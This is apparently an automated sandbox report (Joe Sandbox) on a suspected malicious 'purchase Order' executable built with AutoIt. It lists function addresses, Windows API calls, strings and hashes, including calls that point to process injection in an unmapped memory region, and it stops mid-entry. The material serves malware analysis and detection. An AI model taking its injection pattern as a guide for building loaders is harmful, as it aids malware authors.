Instruction ID: 7e74b2bca5640d612156a459945e32ae5f22bb247e94354033c98273e0de196f
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: B6A1F774E00209EBDB24CFE4C999BAEFBB5BF48704F20816DE515BB280D7759A41CB94

Function 00C449FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00C44A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00CB41DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00CB421A
RegCloseKey.ADVAPI32(?), ref: 00CB4249

Strings

Include, xrefs: 00CB41D3, 00CB4212
Software\AutoIt v3\AutoIt, xrefs: 00C44A13

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: edc77c71d51ae3be059f1ebdec1ace0e62885b44a3382b76baff0b5e1f6c9d3f
Instruction ID: eb5b005c9095fb1a454a87ec4507589b4c190a79e753040f2c3ba0f6cb33617a
Opcode Fuzzy Hash: edc77c71d51ae3be059f1ebdec1ace0e62885b44a3382b76baff0b5e1f6c9d3f
Instruction Fuzzy Hash: 69113071A00108BEDB04ABA8CD86EEF7BBCEF04344F104069F507D6191EB709E42E750

Function 017CD208 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017CD0F8: Sleep.KERNELBASE(000001F4), ref: 017CD109

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017CD32D

Strings

5A0U6YE3V4I49YURP79ZR13124, xrefs: 017CD390, 017CD393

Memory Dump Source

Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd

Similarity

API ID: CreateFileSleep
String ID: 5A0U6YE3V4I49YURP79ZR13124
API String ID: 2694422964-3410800093
Opcode ID: 4cf754d7eea61e4f0a62a8db218325796c258ad13df14d9321a7ec40cca621cc
Instruction ID: 147e7fa65df56eb5ce7769f7c570ba9153f69ca5ceb14758018b41279bae934f
Opcode Fuzzy Hash: 4cf754d7eea61e4f0a62a8db218325796c258ad13df14d9321a7ec40cca621cc
Instruction Fuzzy Hash: BE517F30D04289DAEB12DBE8C858BEEBBB89F19704F04419DE6447B2C1D6B54B45CBA6

Function 00C451AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C4522F
_wcscpy.LIBCMT ref: 00C45283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C45293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00CB3CB0

Strings

Line: , xrefs: 00CB3CD9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: e004f5eef9b9aa5e60198dd7a4b6428c966c5ae3c02f2688b3975dc8509ed19c
Instruction ID: a880040c1e3cbdc485f86a1cb9aab9cd8c540503e52f384ff7087e587ecd8e7a
Opcode Fuzzy Hash: e004f5eef9b9aa5e60198dd7a4b6428c966c5ae3c02f2688b3975dc8509ed19c
Instruction Fuzzy Hash: 3031AD75508780AFD335EB60DC42FDE7BE8BB44310F10461EF59992192EBB0A648DBA7

Function 00C44139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00C441A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C439FE,?,00000001), ref: 00C441DB

_free.LIBCMT ref: 00CB36B7
_free.LIBCMT ref: 00CB36FE

Part of subcall function 00C4C833: __wsplitpath.LIBCMT ref: 00C4C93E
Part of subcall function 00C4C833: _wcscpy.LIBCMT ref: 00C4C953
Part of subcall function 00C4C833: _wcscat.LIBCMT ref: 00C4C968
Part of subcall function 00C4C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00C4C978

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00CB3491
Bad directive syntax error, xrefs: 00CB36E4

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: ea19131e1a1e2f0d5f661ce2dfd46cd1e287588db7931d67117fcf0bb3d7a8e4
Instruction ID: fb1aa2164d884746ad48196997674b3df55f03b65a94d95bf9f3a68f7b0f0e2b
Opcode Fuzzy Hash: ea19131e1a1e2f0d5f661ce2dfd46cd1e287588db7931d67117fcf0bb3d7a8e4
Instruction Fuzzy Hash: 75918271910259EFCF14EFA5CC919EEB7B4FF18310F14442AF826AB291DB30AA45DB54

Function 00C44A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C45374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D01148,?,00C461FF,?,00000000,00000001,00000000), ref: 00C45392

Part of subcall function 00C449FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00C44A1D

_wcscat.LIBCMT ref: 00CB2D80
_wcscat.LIBCMT ref: 00CB2DB5

Strings

\, xrefs: 00CB2DA2
\Include\, xrefs: 00C44B0A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: b89c08eb28b7eb9a022101ee30bd6092df1381028e5bc28fb8f894330c77180d
Instruction ID: 8fceae22b9cd4fc52934d6ef257d319354a98738392cf739056ee0225aec6a68
Opcode Fuzzy Hash: b89c08eb28b7eb9a022101ee30bd6092df1381028e5bc28fb8f894330c77180d
Instruction Fuzzy Hash: 5D516F724063409BC714EF65E985AAEB7F8FF99300B50452EF649D3361EB709608DB63

Function 00C634AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 00C634FE

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00C63539
__wopenfile.LIBCMT ref: 00C63549

Strings

<G, xrefs: 00C634CD, 00C634F0, 00C634FC

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: be2bd49189d2bb010a45ddd379b3ca968d7b7b5fa696aad90bba8fab692b59eb
Instruction ID: 511cfae834dba3da7c23c491bb084c783f82fc4f6feb819e00cc73fbddb5c493
Opcode Fuzzy Hash: be2bd49189d2bb010a45ddd379b3ca968d7b7b5fa696aad90bba8fab692b59eb
Instruction Fuzzy Hash: 4511CA71A00206ABDB72BF758CC267E7BA4AF45750B148925E415D7181EF34CB11B7A1

Function 00C5D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C5D28B,SwapMouseButtons,00000004,?), ref: 00C5D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C5D28B,SwapMouseButtons,00000004,?,?,?,?,00C5C865), ref: 00C5D2DD
RegCloseKey.KERNELBASE(00000000,?,?,00C5D28B,SwapMouseButtons,00000004,?,?,?,?,00C5C865), ref: 00C5D2FF

Strings

Control Panel\Mouse, xrefs: 00C5D2BA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: acab7c9eb1f6653f5e26c355f201fc30d55dcd560e78d53c4a7f667e42724e90
Instruction ID: c787e633d6df3ff569a22bbc76014ffee79383b20d5506095826707fb4716f3d
Opcode Fuzzy Hash: acab7c9eb1f6653f5e26c355f201fc30d55dcd560e78d53c4a7f667e42724e90
Instruction Fuzzy Hash: AC113CB9611309BFDB208FA8CC85EAF7BB8EF44745F104469E806D7120D6319E859B65

Function 017CC0F8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 017CC8B3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017CC949
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017CC96B

Memory Dump Source

Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction ID: 5404f68b77e616a636d31d1ecbdaa470de4fa350755c433336d05ad93f8edf30
Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction Fuzzy Hash: C5620A30A142189BEB24CFA4C854BDEB772EF58700F1091ADD20DEB394E7759E81CB59

Function 00C8C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00C44517: _fseek.LIBCMT ref: 00C4452F

Part of subcall function 00C8C56D: _wcscmp.LIBCMT ref: 00C8C65D
Part of subcall function 00C8C56D: _wcscmp.LIBCMT ref: 00C8C670

_free.LIBCMT ref: 00C8C4DD
_free.LIBCMT ref: 00C8C4E4
_free.LIBCMT ref: 00C8C54F

Part of subcall function 00C61C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00C67A85), ref: 00C61CB1
Part of subcall function 00C61C9D: GetLastError.KERNEL32(00000000,?,00C67A85), ref: 00C61CC3

_free.LIBCMT ref: 00C8C557

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
Instruction ID: bbf693b815437f71d8c0043edafe9b1d43d20a23ca20899eb3e7094ccb28ec2a
Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
Instruction Fuzzy Hash: 6D515EB1904218AFDF249F64DC81BADBBB9FF48304F1044AEF619A3241DB715E809F68

Function 00C5EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C5EBB2

Part of subcall function 00C451AF: _memset.LIBCMT ref: 00C4522F
Part of subcall function 00C451AF: _wcscpy.LIBCMT ref: 00C45283
Part of subcall function 00C451AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C45293

KillTimer.USER32(?,00000001,?,?), ref: 00C5EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C5EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CB3C88

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 788f4fd93c218a9382b4058c07b84e86a5d2aaefb129f0c12386222f2afa4817
Instruction ID: dc1407b4a9a6d51beb791ed31ce9c541b66a423ab685c35d305cd9a9f5964037
Opcode Fuzzy Hash: 788f4fd93c218a9382b4058c07b84e86a5d2aaefb129f0c12386222f2afa4817
Instruction Fuzzy Hash: 672107745047849FE7378B68C859BEBBFEC9B01308F04049DE69E66281C3706B84CB11

Function 00C440E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CB3725
GetOpenFileNameW.COMDLG32 ref: 00CB376F

Part of subcall function 00C4660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C453B1,?,?,00C461FF,?,00000000,00000001,00000000), ref: 00C4662F

Part of subcall function 00C440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C440C6

Strings

X, xrefs: 00CB373E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: a2141aa12d67f3f80248dd80ee15125a0ca6accf14022283fe3162c24447c90d
Instruction ID: 2fad19aa262e14043f77fb1748b6f32112c10aa4c521d00dd8d83e03a56f009c
Opcode Fuzzy Hash: a2141aa12d67f3f80248dd80ee15125a0ca6accf14022283fe3162c24447c90d
Instruction Fuzzy Hash: 5321D5B1A00288ABCF05DF98C845BEE7BF9AF49304F104059E505B7241DBB49A899F62

Function 00C8C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00C8C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C8C746

Strings

aut, xrefs: 00C8C740

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 495b3dc5e754468a05394b8e31b67aa93661bf98e99dc6729ed89bf22beaa922
Instruction ID: 42a510b2fd2157ce1020af270a945dd5161256c4e6d516e5cfc2da56c1ea7e20
Opcode Fuzzy Hash: 495b3dc5e754468a05394b8e31b67aa93661bf98e99dc6729ed89bf22beaa922
Instruction Fuzzy Hash: 9DD05E7150030EBBDB50AB90DC0EF9AB76C9700704F0001B0B751A50B1DAB0EA998B55

Function 00C9F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c7fe3bab9093db691dc8054790df0716384d27ba1879fb01ba9475e8631e01b
Instruction ID: 82f1d0736ebbde1c6772b8eb799d108b27dc24a6fb29718c4c67bc4e2cab8098
Opcode Fuzzy Hash: 4c7fe3bab9093db691dc8054790df0716384d27ba1879fb01ba9475e8631e01b
Instruction Fuzzy Hash: D3F159716083019FCB10DF24C885B5EB7E5FF89314F14896EF9A59B292DB30E946CB82

Function 00C44FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C45022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C450CB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 2e8348505fbe8261cd32138be4742190ae2cb14dd41737acccc8cae43db48687
Instruction ID: 75b975ca955ae6f68273bc434d01487abad251ef4bf9cbf47b8739ffaf1b6a34
Opcode Fuzzy Hash: 2e8348505fbe8261cd32138be4742190ae2cb14dd41737acccc8cae43db48687
Instruction Fuzzy Hash: E5314CB55047019FD725DF64D88579BBBE4FB48308F00092EE69EC7251E771AA44CBA2

Function 00C6395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00C63973

Part of subcall function 00C681C2: __NMSG_WRITE.LIBCMT ref: 00C681E9
Part of subcall function 00C681C2: __NMSG_WRITE.LIBCMT ref: 00C681F3

__NMSG_WRITE.LIBCMT ref: 00C6397A

Part of subcall function 00C6821F: GetModuleFileNameW.KERNEL32(00000000,00D00312,00000104,00000000,00000001,00000000), ref: 00C682B1
Part of subcall function 00C6821F: ___crtMessageBoxW.LIBCMT ref: 00C6835F

Part of subcall function 00C61145: ___crtCorExitProcess.LIBCMT ref: 00C6114B
Part of subcall function 00C61145: ExitProcess.KERNEL32 ref: 00C61154

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00C5F507,?,0000000E), ref: 00C6399F

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 5da762a45d6e81d39ef293128e0bdee7c0fd218a76b32bb4ab348026f4864421
Instruction ID: 20da1e31a99c63e4de84bca1633c63a7da7b18aa331df0547d5987fa1ab1a85a
Opcode Fuzzy Hash: 5da762a45d6e81d39ef293128e0bdee7c0fd218a76b32bb4ab348026f4864421
Instruction Fuzzy Hash: 9901F931345741AAE6313B25ECC6B2E3358DF82725F280125F515D72D1DFB0DE005E60

Function 00C8C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C8C385,?,?,?,?,?,00000004), ref: 00C8C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C8C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C8C708
CloseHandle.KERNEL32(00000000,?,00C8C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C8C70F

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: f9f77ed0e9e1058b6eb3c9039bb7ed02393f967baa81a4bc68ffad99b7bb0564
Instruction ID: cfb4c55e2fc5dfbb6247ea94822f6f396a4f97c49654716dcb0c816309818267
Opcode Fuzzy Hash: f9f77ed0e9e1058b6eb3c9039bb7ed02393f967baa81a4bc68ffad99b7bb0564
Instruction Fuzzy Hash: 17E08632140214B7D7212B54EC0DFCE7B28AB45770F144120FB25790E097B126118798

Function 00C8BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C8BB72

Part of subcall function 00C61C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00C67A85), ref: 00C61CB1
Part of subcall function 00C61C9D: GetLastError.KERNEL32(00000000,?,00C67A85), ref: 00C61CC3

_free.LIBCMT ref: 00C8BB83
_free.LIBCMT ref: 00C8BB95

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
Instruction ID: 94955c15c409ae0a418005e3d46956bf4e1ba37e0ea7351a55ed8d9766c4b5b5
